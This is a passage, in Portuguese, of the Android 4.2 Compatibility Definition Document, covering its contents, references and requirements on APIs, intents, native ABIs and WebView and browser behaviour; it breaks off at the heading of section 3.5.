The “F# Application” and “F# Library” are probably the most commonly-used templates; they create F# EXEs and DLLs respectively. The “F# Tutorial” project starts you off with an F# script with lots of comments and short examples, and serves as a quick tour of some language features and syntax examples. The “F# Silverlight Library” is used for creating a library that targets Silverlight 5, and the “F# Portable Library” is used if you want to create a single DLL that can run on Silverlight 5, on the Windows desktop, or as part of a new Windows 8 app. Most folks know about this portion of the NPD, as you visit this dialog each time you create a new project.
Something that is perhaps less well-known is that there are a variety of online templates available directly from the NPD as well. In the left-hand pane, if you select ‘Online’, then ‘Templates’ and ‘Visual F#’ you can see lots more project templates for creating starter projects that use F# in a various of frameworks:
These templates have been contributed by the community to the Visual Studio Gallery (from the website, you can also browse for templates). We’ll see how easy and useful it can be to take advantage of these online templates in a moment. But while we’re looking at the NPD, I’ll also point out that samples are also available from the left-hand pane:
I’ll discuss both online samples from the NPD, as well as other places to get F# samples, in a future blog post; for now I just wanted to point out this way to obtain some F# samples right from inside Visual Studio.
For the purpose of exposition for the rest of this blog post, it is useful to have a small sample F# application & library on-hand, so let’s create one. Since this blog is about Visual Studio tooling for F#, and not so much about code, I’ll resort to a trite but familiar example, with my apologies to those who are tired of seeing F# compute prime numbers. I’ll start with a new F# Library project with this code:
module PrimesLibopen Microsoft.FSharp.Collectionslet odds = let limit = System.Int32.MaxValue |> float |> sqrt |> int [3..2..limit]let isPrime n = // naïve implementation 2::odds |> Seq.forall (fun x -> n%x <> 0 || n=x)
and then I’ll try it out it by adding an F# Application to the solution, add a project reference to my library, and putting the code
open PrimesLib[2..20] |> List.filter isPrime |> printfn "%A"
in the app. I set the application as the startup project, build, and run, and I see the expected output:
[2; 3; 5; 7; 11; 13; 17; 19]
Now that we have a simple library and app, let’s show off some Visual Studio 2012 features.
In Visual Studio 2012, F# works with MSTest, and there is a good online template to get started. I’ll add a new project to our solution, and then in the NPD, click ‘Online’ in the left pane, and then type “F# mstest” in the search box at the upper-right:
That’s the template we want. I create a project from the template (if this is my first time using this online template, I’ll be prompted to download & install the template after agreeing to any license terms an online template may contain), which starts us with starter source code for our test library:
namespace UnitTestProject1open Systemopen Microsoft.VisualStudio.TestTools.UnitTesting[<TestClass>]type UnitTest() = [<TestMethod>] member x.TestMethod1 () = let testVal = 1 Assert.AreEqual(1, testVal)
Let’s replace the sample test method with our own code that gives us some confidence that isPrime is working correctly. I’ll add a project reference from the unit test project to my primes library, and then replace the unit test method with
[<TestMethod>]member x.TestIsPrime() = let expected = [2;3;5;7;11;13;17;19] let actual = [2..20] |> List.filter PrimesLib.isPrime Assert.AreEqual(expected, actual)
Now we can run the test by selecting ‘TEST\Run…\All Tests’ from the VS menu, and VS will run the unit tests:
Great! We have a passing unit test. Now we can evolve our code with more confidence. Perhaps next I’m trying to discover which digit is most common for prime numbers to end in. I might want to add the function
let finalDigitOfPrimesUpTo n = [|2..n|] |> Seq.filter isPrime |> Seq.groupBy (fun i -> i % 10) |> Seq.map (fun (k, vs) -> (k, Seq.length vs)) |> Seq.sortBy fst |> Seq.toList
to get a sample of the data for all the primes up to N. I can run it from my app by adding this code
printfn "%A" (finalDigitOfPrimesUpTo 500000)
which eventually prints
[(1, 10386); (2, 1); (3, 10382); (5, 1); (7, 10403); (9, 10365)]
showing me that primes appear to be pretty evenly distributed among numbers ending in the digits 1, 3, 7, or 9.
Let’s add a unit test for this code:
[<TestMethod>]member x.TestFinalDigits() = let expected = [(1,10386); (2,1); (3,10382); (5,1); (7,10403); (9,10365)] let actual = PrimesLib.finalDigitOfPrimesUpTo 500000 Assert.AreEqual(expected, actual)
I notice that this computation takes a while to run—about 12 seconds on my machine. A very simple way to speed this up is to do the computations for each number in parallel. I happen to know that the F# Powerpack contains a ‘PSeq’ module, which works like ‘Seq’, but runs functions like ‘filter’ and ‘map’ in parallel. I’d like to try applying it to this code, but how do I obtain the F# Powerpack to use in my solution? NuGet to the rescue!
NuGet is package management system that’s integrated into Visual Studio 2012, making it very easy to obtain and use a variety of libraries in your project. I can right-click on my library project to find ‘Manage NuGet Packages…’ on the context menu in VS:
which brings up the dialog pictured below for NuGet. I can type ‘fsharp’ (note: not ‘F#’; the search here does not like the ‘#’ character) in the search box in the upper-right, and see that
there are a lot of packages written for (and in) F#. In this case, I can just click on the FSPowerPack.Community package, click install, agree to the license terms, and then I can see that the Powerpack has been added to my library project if I look at the references:
Now in the code for finalDigitOfPrimesUpTo, I can replace each “Seq.” with “PSeq.” and if I rerun my app, I see that the running time on my machine has gone down to about 3 seconds (previously it took about 12). NuGet makes it extremely easy to obtain useful libraries and integrate them into your projects without ever leaving the Visual Studio 2012 IDE.
If I rerun the unit tests at this point, I’m in for a little surprise:
The unit test fails with
FileLoadException: Could not load file or assembly 'F F# Powerpack package I added was (at the time I authored this blog post; it may have since been updated) built against F# in Visual Studio 2010, and has a reference to FSharp.Core 4.0.0.0 (the F# runtime in Visual Studio 2010). In Visual Studio 2012, there’s a newer version of the F# runtime, FSharp.Core 4.3.0.0, which is compatible, but has some new added features. Things worked fine when I ran this from the app, thanks to bindingRedirect in the App.config file in the console application which declares that it’s fine to use the 4.3.0.0 version instead of the 4.0.0.0 version of FSharp.Core. Indeed, our unit test project also has the appropriate App.config file, which should allow the CLR to load the newer version of the F# runtime, even though the F# Powerpack claims to depend on the old one. However a bug* in the MSTest runner means that it ignores the App.config file in the unit test project. Fortunately, there is a simple workaround you can apply with an MSTest ‘runsettings’ file, and such a file has been included by default in the F# MSTest project template. Simply select ‘TEST\Test Settings\Select Test Settings File” from the menu in VS, and point it at the MSTest.runsettings file in the unit test project. Now MSTest will pick up the App.config from the unit tests, and all our tests pass again.
(* - this bug is present in Visual Studio 2012 at the time of this blog post (September 2012), though it may be fixed in future update to Visual Studio.)
And we’re done – we’ve got a library supported by unit tests, that leveraged both an online project template and a NuGet community package.
To sum up the experiences in this blog post:
I hope you’ve learned something new and useful today!
Brian McNamara Visual Studio F# Developer
Hi Brian, the code in this article is unreadable in both IE9 and Chrome (all goes on a single line).
Thanks for letting us know, ildjarn! Should be fixed now.
Hi. I like this technique: NuGet package Fsharpx TypeProvider XAML, ref. Expert F# 3.0 pg 469.
I used in recently (Feb 2013) on an F# 3.0, WPF, 3D .sln in VS'12 Pro.
Art
-------
// The full Nuget package path ... varies with your installation
#r @"C:\Users\Honu\SkyDrive\...\packages\FSharpx.Core.1.7.3\lib\40\FSharpx.Core.dll"
#r @"C:\Users\Honu\SkyDrive\...\packages\FSharpx.TypeProviders.Xaml.1.7.3\lib\40\FSharpx.TypeProviders.Xaml.dll"
// and opening the following namespaces ...
// Test F# + XAML concept --
// ... \packages\FSharpx.TypeProviders.Xaml.1.7.3\lib\40\FSharpx.TypeProviders.Xaml.dll
...
open FSharpx
type MainWindow = XAML<"CWDrawingSurface.xaml">
// Main Program
// 3D Scene Creation
#if COMPILED
[<System.STAThreadAttribute>]
do
// create our window
// technique: NuGet package Fsharpx TypeProvider XAML, ref. Expert F# 3.0 pg 469
// motivation: -- XAML is supported by Win8 and WP8(?)
// -- VS'12 Pro (and VS'12 Express for Web?) Blend support for F# 3.0
let w = MainWindow() // initializes typed access to *.xaml
let wnd = w.Root // gets the root element, i.e. Window
// Declare XAML Scene Objects
let myViewport3D = Viewport3D()
...
let data = GenerateGraphicsResult()
// let data = GraphicsResult(points, mesh, textures, rectangles, colors)
myMeshGeometry3D.Positions <- Point3DCollection(data.Points)
myMeshGeometry3D.TriangleIndices <- Int32Collection(data.Mesh)
myMeshGeometry3D.TextureCoordinates <- PointCollection(data.Texture)
|
http://blogs.msdn.com/b/fsharpteam/archive/2012/09/24/online-project-templates-nuget-and-unit-testing-with-f-in-vs2012.aspx
|
CC-MAIN-2015-18
|
en
|
refinedweb
|
).
Parameters
(none)
Return value
A
shared_ptr which shares ownership of the owned object.
Exceptions>.
Example
Run this code
#include <iostream> #include <memory> #include <thread> typedef std::shared_ptr<int> IntPtr; typedef std::weak_ptr<int> IntWeakPtr; void observe(IntWeakPtr pWeak) { IntPtr pObserve(pWeak.lock()); if (pObserve) { std::cout << "\tobserve() able to lock weak_ptr<>, value=" << *pObserve << "\n"; } else { std::cout << "\tobserve() unable to lock weak_ptr<>\n"; } } int main() { IntWeakPtr pWeak; std::cout << "weak_ptr<> not yet initialized\n"; observe(pWeak); { IntPtr pShared(new int(42)); pWeak = pShared; std::cout << "weak_ptr<> initialized with shared_ptr.\n"; observe(pWeak); } std::cout << "shared_ptr<> has been destructed due to scope exit.\n"; observe(pWeak); }
Output:
weak_ptr<> not yet initialized observe() unable to lock weak_ptr<> weak_ptr<> initialized with shared_ptr. observe() able to lock weak_ptr<>, value=42 shared_ptr<> has been destructed due to scope exit. observe() unable to lock weak_ptr<>
|
http://en.cppreference.com/mwiki/index.php?title=cpp/memory/weak_ptr/lock&oldid=46733
|
CC-MAIN-2015-18
|
en
|
refinedweb
|
#include <Xm/Xm.h> to provide a compound string, to be included in the compound string being created whenever the pattern is matched.
An application uses a resource-style interface to specify components for an XmParseMapping. XmParseMappingCreate creates a parse mapping, using a resource-style argument list. XmParseMappingGetValues and XmParseMappingSetValues retrieve and set the components of a parse mapping. XmParseMappingFree recovers memory used by a parse mapping. XmParseTable is an array of XmParseMapping objects.
The XmNinvokeParseProc resource is a function of type XmParseProc, which is defined as follows:
XmIncludeStatus (*XmParseProc) (text_in_out, text_end, type, tag, entry, pattern_length, str_include, call_data) XtPointer *text_in_out; XtPointer text_end; XmTextType type; XmStringTag tag; XmParseMapping entry; int pattern_length; XmString *str_include; XtPointer call_data;
A parse procedure provides an escape mechanism for arbitrarily complex parsing. This procedure is invoked when a pattern in the input text is matched with a pattern in a parse mapping whose XmNincludeStatus is XmINVOKE.
The input text is a pointer to the first byte of the pattern that was matched to trigger the call to the parse procedure. The parse procedure consumes as many bytes of the input string as it needs and sets the input text pointer to the following byte. It returns a compound string to be included in the compound string being constructed, and it also returns an XmIncludeStatus indicating how the returned compound string should be handled. If the parse procedure does not set the input text pointer ahead by at least one byte, the parsing routine continues trying to match the input text with the patterns in the remaining parse mappings in the parse table. Otherwise, the parsing routine begins with the new input text pointer and tries to match the input text with patterns in the parse mappings starting at the beginning of the parse table.
The parse procedure returns an XmIncludeStatus indicating how str_include is to be included in the compound string being constructed. Following are the possible values:).
XmParseMappingCreate(3), XmParseMappingFree(3), XmParseMappingGetValues(3), XmParseMappingSetValues(3), XmParseTable(3), and XmString(3).
|
http://www.makelinux.net/man/3/X/XmParseMapping
|
CC-MAIN-2015-18
|
en
|
refinedweb
|
08 July 2011 19:51 [Source: ICIS news]
TORONTO (ICIS)--Canexus has completed its conversion from income fund to corporation status, the Canadian chlor-alkali and sodium chlorate producer said on Friday.
Canexus said the move will not involve any changes to the way it runs its chemical businesses.
The company expects to starting trading its shares on the ?xml:namespace>
Canadian income funds have become less attractive following changes in tax laws that were first announced in 2006 and brought into effect this year.
However, another Canadian chemicals firm, Chemtrade Logistics, has said it will continue to operate as an income fund as it believes the tax impact on its business will only
|
http://www.icis.com/Articles/2011/07/08/9476303/canexus-completes-conversion-to-corporation-status.html
|
CC-MAIN-2015-18
|
en
|
refinedweb
|
from BeautifulSoup import BeautifulSoup
import urllib2
from BeautifulSoup import BeautifulSoup
event_url = ''
soup = BeautifulSoup(urllib2.urlopen(event_url))
event_info = soup.findAll("dl", { "class" : "clearfix" })
s = BeautifulSoup(str(event_info))
l = s.findAll("dt")
for dt in l:
print dt
<dt>Where:</dt>
<dt> </dt>
<dt>When:</dt>
<dt> </dt>
<dt>Website:</dt>
<dt>Contact:</dt>
for dt in l:
m = dt.replace('<dt>', '')
clear_dt = m.replace('</dt>', '')
print clear_dt #print as string without <dt> & </dt>
Statistics: Posted by yuyb0y — Sat Apr 18, 2015 11:34 am
>>> import re
>>>>> re.sub(r'(\t\t[0-9]{1,3}\t\t)', r'TEXT\1', s)
'TEXT\t\t24\t\tblah blah blahTEXT\t\t56\t\t'
Statistics: Posted by stranac — Sat Apr 18, 2015 10:12 am
Statistics: Posted by stranac — Sat Apr 18, 2015 10:02 am
Statistics: Posted by Skaperen — Sat Apr 18, 2015 9:58 am
Statistics: Posted by Skaperen — Sat Apr 18, 2015 9:53 am
pritesh wrote:
Skaperen - You've mentioned that I should learn Python 3. But if all the modules I need are still not ported to Python 3. Hence my choice of Python 2. Please let me know if it's otherwise.
Statistics: Posted by Skaperen — Sat Apr 18, 2015 9:45 am
Kebap wrote:
Seems legit, if you do not want to convert any scripts for now. Still valueable information may be in documents written for this purpose. These documents also list the differences you search, reasons for the version switch, etc. Just ignore the other parts..
Source:
Statistics: Posted by Skaperen — Sat Apr 18, 2015 9:35 am
import urllib2
from bs4 import BeautifulSoup
event_url = ''
soup = BeautifulSoup(urllib2.urlopen(event_url))
event_info = soup.find('dl', _class='clearfix')
if event_info:
dt_list = [dt.text.strip() for dt in event_info.find_all('dt')]
print dt_list
Statistics: Posted by buran — Sat Apr 18, 2015 6:55 am
Statistics: Posted by pritesh — Sat Apr 18, 2015 6:23 am
Abbeville TX
Bakerhill TX
Abernant GA
Bangor GA
Alabaster AL
Berry AL
Alabaster AL
Berry AL
Abernant GA
Bangor GA
Abbeville TX
Bakerhill TX))
Statistics: Posted by farook — Sat Apr 18, 2015 5:56 am
Statistics: Posted by blackystrat — Sat Apr 18, 2015 5:04 am
from __future__ import division
def wave1(lamb, conv):
v = (299792458)/lamb
E = (6.62606957E-34) * v
if conv == "joules":
print "The frequency is",v,"in Hz, and the energy is",E,"in joules."
elif conv == "eV":
print "The frequency is",v,"in Hz and the energy is", E/(1.602E-19),"in eV."
elif conv == "e_mass":
print "The frequency is",v,"in Hz and the energy is",(E/(1.602E-19)) * 5.11E6,"in electron mass."
else:
print "Might want to check your spelling."
Statistics: Posted by Fred Barclay — Fri Apr 17, 2015 11:36 pm
Statistics: Posted by Fred Barclay — Fri Apr 17, 2015 11:30 pm
Statistics: Posted by Jonty — Fri Apr 17, 2015 11:26 pm
Heading 1, Heading 2, Heading 3, Average, Statistical analysis
1, 4, 7, Average of this row, statistical analysis
2, 5, 8, Average of this row, statistical analysis
3, 6, 9, Average of this row, statistical analysis
Statistics: Posted by pynew — Fri Apr 17, 2015 11:21 pm
|
http://www.python-forum.org/feed.php
|
CC-MAIN-2015-18
|
en
|
refinedweb
|
Revisão 2
Última atualização: 17 de fevereiro de 2013
compatibilidade@android.com
Índice
2. Recursos
3. Software
3.2. Compatibilidade de API suave
3.2.2. Parâmetros de compilação
3.2.3. Compatibilidade de intenção
3.4. Compatibilidade da Web
3.5. Compatibilidade Comportamental da API
3.6. Namespaces de API
3.7. Compatibilidade de Máquinas Virtuais
3.8. Compatibilidade da interface do usuário
3.8.2. Notificações
3.8.3. Procurar
3.8.4. Torradas
3.8.5. Temas
3.8.6. Papel de parede animados
3.8.7. Exibição de aplicativo recente
3.8.8. Configurações de gerenciamento de entrada
3.8.9. Widgets de bloqueio e tela inicial
3.8.10. Controle remoto de mídia de tela de bloqueio
3.8.11. Sonhos
3.10 Acessibilidade
3.11 Text-to-Speech
5. Compatibilidade Multimídia
5.2. Codificação de vídeo
5.3. Decodificação de vídeo
5.4. Gravação de áudio
5.5. Latência de áudio
5.6. Protocolos de rede
7. Compatibilidade de Hardware
7.1.2. Métricas de exibição
7.1.3. Orientação da tela
7.1.4. Aceleração de gráficos 2D e 3D
7.1.5. Modo de compatibilidade de aplicativos legados
7.1.6. Tipos de tela
7.1.7. Tecnologia de tela
7.1.8. Monitores Externos
7.2.2. Navegação sem toque
7.2.3. Teclas de navegação
7.2.4. Entrada de tela sensível ao toque
7.3.2. Magnetômetro
7.3.3. GPS
7.3.4. Giroscópio
7.3.5. Barômetro
7.3.6. Termômetro
7.3.7. Fotômetro
7.3.8. Sensor de proximidade
7.4.2. IEEE 802.11 (Wi-Fi)
7.4.3. Bluetooth
7.4.4. Comunicações de campo próximo
7.4.5. Capacidade mínima de rede
7.5.2. Câmera frontal
7.5.3. Comportamento da API da câmera
7.5.4. Orientação da câmera
7.7. USB
9. Compatibilidade do Modelo de Segurança
9.2. UID e isolamento de processo
9.3. Permissões do sistema de arquivos
9.4. Ambientes de Execução Alternativos
9.5. Suporte multiusuário
9.6. Aviso de SMS Premium
11. Software atualizável
12. Entre em contato conosco
Apêndice A - Procedimento de teste de Bluetooth
1. Introdução
Este documento enumera os requisitos que devem ser atendidos para que os dispositivos sejam compatíveis com o Android 4.2.
O uso de "deve", "não deve", "obrigatório", "deve", "não deve", "deve", "não deve", "recomendado", "pode" e "opcional" é de acordo com o padrão IETF definido na RFC2119 [ Recursos, 1 ].
Conforme usado neste documento, um "implementador de dispositivo" ou "implementador" é uma pessoa ou organização que desenvolve uma solução de hardware/software que executa o Android 4.2. Uma "implementação de dispositivo" ou "implementação" é a solução de hardware/software desenvolvida.
Para serem consideradas compatíveis com o Android 4.2, as implementações de dispositivos DEVEM atender aos requisitos apresentados nesta Definição de Compatibilidade, incluindo quaisquer documentos incorporados por referência.
Quando esta definição ou os testes de software descritos na Seção 10 forem omissos, ambíguos ou incompletos, é responsabilidade do implementador do dispositivo garantir a compatibilidade com as implementações existentes.
Por esse motivo, o Android Open Source Project [ Resources, 3 ] é a implementação de referência e preferida do Android. Os implementadores de dispositivos são fortemente encorajados a basear suas implementações o máximo possível no código-fonte "upstream" disponível no Android Open Source Project. Embora alguns componentes possam hipoteticamente ser substituídos por implementações alternativas, essa prática é fortemente desencorajada, pois passar nos testes de software se tornará substancialmente mais difícil. É responsabilidade do implementador garantir total compatibilidade comportamental com a implementação padrão do Android, incluindo e além do Compatibility Test Suite. Finalmente, observe que certas substituições e modificações de componentes são explicitamente proibidas por este documento.
2. Recursos
- Níveis de requisitos IETF RFC2119:
- Visão geral do programa de compatibilidade do Android:
- Projeto de código aberto Android:
- Definições e documentação da API:
- Referência de permissões do Android:
- Referência android.os.Build:
- Strings de versão permitidas do Android 4.2:
- Renderscript:
- Aceleração de hardware:
- classe android.webkit.WebView:
- HTML5:
- Recursos off-line HTML5:
- Tag de vídeo HTML5:
- API de geolocalização HTML5/W3C:
- API de banco de dados da web HTML5/W3C:
- API HTML5/W3C IndexedDB:
- Especificação da Dalvik Virtual Machine: disponível no código-fonte do Android, em dalvik/docs
- AppWidgets:
- Notificações:
- Recursos do aplicativo:
- Guia de estilo do ícone da barra de status:
- Gerenciador de pesquisa:
- Brindes:
- Temas:
- Classe R.style:
- Papéis de parede ao vivo:
- Administração de dispositivos Android:
- Referência DevicePolicyManager:
- APIs do serviço de acessibilidade do Android:
- APIs de acessibilidade do Android:
- Projeto Eyes Free:
- APIs de conversão de texto em fala:
- Documentação da ferramenta de referência (para adb, aapt, ddms, systrace):
- Descrição do arquivo apk do Android:
- Arquivos de manifesto:
- Ferramenta de teste de macaco:
- Android android.content.pm.PackageManager classe e lista de recursos de hardware:
- Suporte a várias telas:
- android.util.DisplayMetrics:
- android.content.res.Configuration:
- android.hardware.SensorEvent:
- API Bluetooth:
-:
- API de orientação da câmera:
- Câmera:
- Acessórios abertos para Android:
- API de host USB:
- Referência de segurança e permissões do Android:
- Aplicativos para Android:
- Android DownloadManager:
- Transferência de arquivos do Android:
- Formatos de mídia do Android:
- Protocolo de rascunho de transmissão ao vivo HTTP:
- Transferência de conexão NFC:
- Emparelhamento simples seguro Bluetooth usando NFC:
- API Multicast Wifi:
- Assistente de ação:
- Especificação de carregamento USB:
- Android Beam:
- Áudio USB Android:
- Configurações de compartilhamento NFC do Android:
- Wifi Direct (Wifi P2P):
- Widget de bloqueio e tela inicial:
- Referência do UserManager:
- Referência de armazenamento externo:
- APIs de armazenamento externo:
- Código curto de SMS:
- Cliente de controle remoto de mídia:
- Gerenciador de exibição:
- Sonhos:
- Configurações relacionadas ao desenvolvimento de aplicativos Android:
Muitos desses recursos são derivados direta ou indiretamente do SDK do Android 4.2 e serão funcionalmente idênticos às informações na documentação desse SDK. Em todos os casos em que esta Definição de Compatibilidade ou o Conjunto de Testes de Compatibilidade discordar da documentação do SDK, a documentação do SDK é considerada oficial. Quaisquer detalhes técnicos fornecidos nas referências incluídas acima são considerados pela inclusão como parte desta Definição de Compatibilidade.
3. Software
3.1. Compatibilidade de API gerenciada
O ambiente de execução gerenciado (baseado em Dalvik) é o principal veículo para aplicativos Android. A interface de programação de aplicativos (API) do Android é o conjunto de interfaces da plataforma Android expostas a aplicativos executados no ambiente de VM gerenciada. As implementações de dispositivos DEVEM fornecer implementações completas, incluindo todos os comportamentos documentados, de qualquer API documentada exposta pelo SDK do Android 4.2 [ Recursos, 4 ].
As implementações de dispositivos NÃO DEVEM omitir nenhuma API gerenciada, alterar interfaces ou assinaturas de API, desviar-se do comportamento documentado ou incluir no-ops, exceto quando especificamente permitido por esta Definição de Compatibilidade.
Essa definição de compatibilidade permite que alguns tipos de hardware para os quais o Android inclui APIs sejam omitidos por implementações de dispositivos. Nesses casos, as APIs ainda DEVEM estar presentes e se comportar de maneira razoável. Consulte a Seção 7 para obter os requisitos específicos para este cenário.
3.2. Compatibilidade de API suave
Além das APIs gerenciadas da Seção 3.1, o Android também inclui uma API "soft" somente de tempo de execução significativa, na forma de coisas como Intents, permissões e aspectos semelhantes de aplicativos Android que não podem ser aplicados no tempo de compilação do aplicativo.
3.2.1. Permissões
Os implementadores de dispositivos DEVEM dar suporte e aplicar todas as constantes de permissão conforme documentado pela página de referência de permissão [ Recursos, 5 ]. Observe que a Seção 10 lista os requisitos adicionais relacionados ao modelo de segurança do Android.
3.2.2. Parâmetros de compilação
As APIs do Android incluem várias constantes na classe
android.os.Build [ Resources, 6 ] que se destinam a descrever o dispositivo atual. Para fornecer valores consistentes e significativos em implementações de dispositivos, a tabela abaixo inclui restrições adicionais sobre os formatos desses valores aos quais as implementações de dispositivos DEVEM estar em conformidade.
3.2.3. Compatibilidade de intenção
As implementações de dispositivos DEVEM respeitar o sistema Intent de acoplamento flexível do Android, conforme descrito nas seções abaixo. Por "honrado", entende-se que o implementador do dispositivo DEVE fornecer uma atividade ou serviço Android que especifique um filtro de intent correspondente e se vincule e implemente o comportamento correto para cada padrão de intent especificado.
3.2.3.1. Principais intenções do aplicativo
O projeto upstream do Android define vários aplicativos principais, como contatos, calendário, galeria de fotos, reprodutor de música e assim por diante. Os implementadores de dispositivos PODEM substituir esses aplicativos por versões alternativas.
No entanto, quaisquer versões alternativas DEVEM respeitar os mesmos padrões de Intent fornecidos pelo projeto upstream. Por exemplo, se um dispositivo contém um player de música alternativo, ele ainda deve respeitar o padrão Intent emitido por aplicativos de terceiros para escolher uma música.
Os seguintes aplicativos são considerados aplicativos principais do sistema Android:
- Relógio de mesa
- Navegador
- Calendário
- Contatos
- Galeria
- Pesquisa global
- Iniciador
- Música
- Definições
Os principais aplicativos do sistema Android incluem vários componentes de atividade ou serviço que são considerados "públicos". Ou seja, o atributo "android:exported" pode estar ausente ou pode ter o valor "true".
Para cada atividade ou serviço definido em um dos principais aplicativos do sistema Android que não está marcado como não público por meio de um atributo android:exported com o valor "false", as implementações de dispositivos DEVEM incluir um componente do mesmo tipo implementando o mesmo filtro de intent padrões como o aplicativo principal do sistema Android.
Em outras palavras, uma implementação de dispositivo PODE substituir os principais aplicativos do sistema Android; no entanto, se isso acontecer, a implementação do dispositivo DEVE dar suporte a todos os padrões de Intent definidos por cada aplicativo principal do sistema Android que está sendo substituído.
3.2.3.2. Substituições de intenção
Como o Android é uma plataforma extensível, as implementações de dispositivos DEVEM permitir que cada padrão Intent mencionado na Seção 3.2.3.2 seja substituído por aplicativos de terceiros. A implementação de código aberto do Android upstream permite isso por padrão; os implementadores de dispositivos NÃO DEVEM anexar privilégios especiais ao uso desses padrões de Intent pelos aplicativos do sistema ou impedir que aplicativos de terceiros se vinculem e assumam o controle desses padrões. Essa proibição inclui especificamente, mas não se limita a, desabilitar a interface do usuário "Chooser", que permite ao usuário selecionar entre vários aplicativos que lidam com o mesmo padrão de Intent.
No entanto, as implementações de dispositivos PODEM fornecer atividades padrão para padrões de URI específicos (por exemplo,) se a atividade padrão fornecer um filtro mais específico para o URI de dados. Por exemplo, um filtro de intent que especifica o URI de dados "" é mais específico do que o filtro do navegador para "http://". As implementações de dispositivos DEVEM fornecer uma interface de usuário para que os usuários modifiquem a atividade padrão para intents.
3.2.3.3. Namespaces de intent
As implementações de dispositivos NÃO DEVEM incluir nenhum componente Android que honre qualquer novo padrão de Intent ou Broadcast Intent usando ACTION, CATEGORY ou outra string de chave no namespace android.* ou com.android.*. Os implementadores de dispositivos NÃO DEVEM incluir componentes do Android que honrem quaisquer novos padrões de Intent ou Broadcast Intent usando ACTION, CATEGORY ou outra string de chave em um espaço de pacote pertencente a outra organização. Os implementadores de dispositivos NÃO DEVEM alterar ou estender nenhum dos padrões de Intent usados pelos aplicativos principais listados na Seção 3.2.3.1. As implementações de dispositivos PODEM incluir padrões de intenção usando namespaces clara e obviamente associados à sua própria organização.
Essa proibição é análoga àquela especificada para classes de linguagem Java na Seção 3.6.
3.2.3.4. Intenções de transmissão
Aplicativos de terceiros dependem da plataforma para transmitir determinados Intents para notificá-los sobre alterações no ambiente de hardware ou software. Dispositivos compatíveis com Android DEVEM transmitir os intents de transmissão pública em resposta a eventos de sistema apropriados. As intenções de transmissão são descritas na documentação do SDK.
3.3. Compatibilidade de API nativa
3.3.1 Interfaces Binárias do Aplicativo
O código gerenciado executado no Dalvik pode chamar o código nativo fornecido no arquivo .apk do aplicativo como um arquivo .so ELF compilado para a arquitetura de hardware do dispositivo apropriado. Como o código nativo é altamente dependente da tecnologia de processador subjacente, o Android define várias interfaces binárias de aplicativos (ABIs) no Android NDK, no arquivo
docs/CPU-ARCH-ABIS.html . Se uma implementação de dispositivo for compatível com uma ou mais ABIs definidas, ela DEVE implementar a compatibilidade com o Android NDK, conforme abaixo.
Se uma implementação de dispositivo incluir suporte para uma ABI do Android, ela:
- DEVE incluir suporte para código em execução no ambiente gerenciado para chamar código nativo, usando a semântica padrão da Java Native Interface (JNI).
- DEVE ser compatível com a fonte (ou seja, compatível com cabeçalho) e compatível com binário (para a ABI) com cada biblioteca necessária na lista abaixo
- DEVE relatar com precisão a Application Binary Interface (ABI) nativa suportada pelo dispositivo, por meio da API
android.os.Build.CPU_ABI
- DEVE relatar apenas as ABIs documentadas na versão mais recente do Android NDK, no arquivo
docs/CPU-ARCH-ABIS.txt
- DEVE ser construído usando o código-fonte e os arquivos de cabeçalho disponíveis no projeto de código aberto do Android upstream
As seguintes APIs de código nativo DEVEM estar disponíveis para aplicativos que incluem código nativo:
- libc (biblioteca C)
- libm (biblioteca matemática)
- Suporte mínimo para C++
- Interface JNI
- liblog (registro do Android)
- libz (compressão Zlib)
- libdl (ligador dinâmico)
- libGLESv1_CM.so (OpenGL ES 1.0)
- libGLESv2.so (OpenGL ES 2.0)
- libEGL.so (gerenciamento de superfície OpenGL nativo)
- libjnigraphics.so
- libOpenSLES.so (suporte de áudio OpenSL ES 1.0.1)
- libOpenMAXAL.so (suporte a OpenMAX AL 1.0.1)
- libandroid.so (suporte nativo à atividade do Android)
- Suporte para OpenGL, conforme descrito abaixo
Observe que versões futuras do Android NDK podem apresentar suporte para ABIs adicionais. Se uma implementação de dispositivo não for compatível com uma ABI predefinida existente, ela NÃO DEVE relatar suporte para nenhuma ABI.
A compatibilidade de código nativo é um desafio. Por esta razão, deve-se repetir que os implementadores de dispositivos são MUITO fortemente encorajados a usar as implementações upstream das bibliotecas listadas acima para ajudar a garantir a compatibilidade.
3.4. Compatibilidade da Web
3.4.1. Compatibilidade do WebView
A implementação do Android Open Source usa o mecanismo de renderização WebKit para implementar o
android.webkit.WebView . Como não é viável desenvolver um conjunto de testes abrangente para um sistema de renderização da Web, os implementadores de dispositivos DEVEM usar a compilação upstream específica do WebKit na implementação do WebView. Especificamente:
- As implementações
android.webkit.WebViewdas implementações de dispositivos DEVEM ser baseadas na compilação 534.30 WebKit da árvore de código aberto do Android para Android 4.2. Esta compilação inclui um conjunto específico de funcionalidades e correções de segurança para o WebView. Os implementadores de dispositivos PODEM incluir personalizações na implementação do WebKit; no entanto, tais personalizações NÃO DEVEM alterar o comportamento do WebView, incluindo o comportamento de renderização.
- A string do agente do usuário relatada pelo WebView DEVE estar neste formato:
Mozilla/5.0 (Linux; U; Android $(VERSION); $(LOCALE); $(MODEL) Build/$(BUILD)) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.2 Mobile Safari/534.30
- O valor da string $(VERSION) DEVE ser o mesmo que o valor de
android.os.Build.VERSION.RELEASE
- O valor da string $(LOCALE) DEVE seguir as convenções ISO para código de país e idioma, e DEVE referir-se à localidade configurada atual do dispositivo
- O valor da string $(MODEL) DEVE ser o mesmo que o valor para
android.os.Build.MODEL
- O valor da string $(BUILD) DEVE ser igual ao valor de
android.os.Build.ID
- Implementações de dispositivos PODEM omitir
Mobilena string do agente do usuário
O componente WebView no WebView:
-.
As APIs HTML5, como todas as APIs JavaScript, DEVEM ser desabilitadas por padrão em um WebView, a menos que o desenvolvedor as habilite explicitamente por meio das APIs Android usuais.
3.4.2. Compatibilidade do navegador
As implementações de dispositivos DEVEM incluir um aplicativo de navegador autônomo para navegação na web do usuário em geral. O navegador autônomo PODE ser baseado em uma tecnologia de navegador diferente do WebKit. No entanto, mesmo que um aplicativo de navegador alternativo seja usado, o componente
android.webkit.WebView fornecido para aplicativos de terceiros DEVE ser baseado no WebKit, conforme descrito na Seção 3.4.1.
As implementações PODEM enviar uma string personalizada do agente do usuário no aplicativo do navegador autônomo.
O aplicativo de navegador autônomo (seja baseado no aplicativo de navegador WebKit upstream ou um substituto de terceiros).
3.5. Compatibilidade Comportamental da API
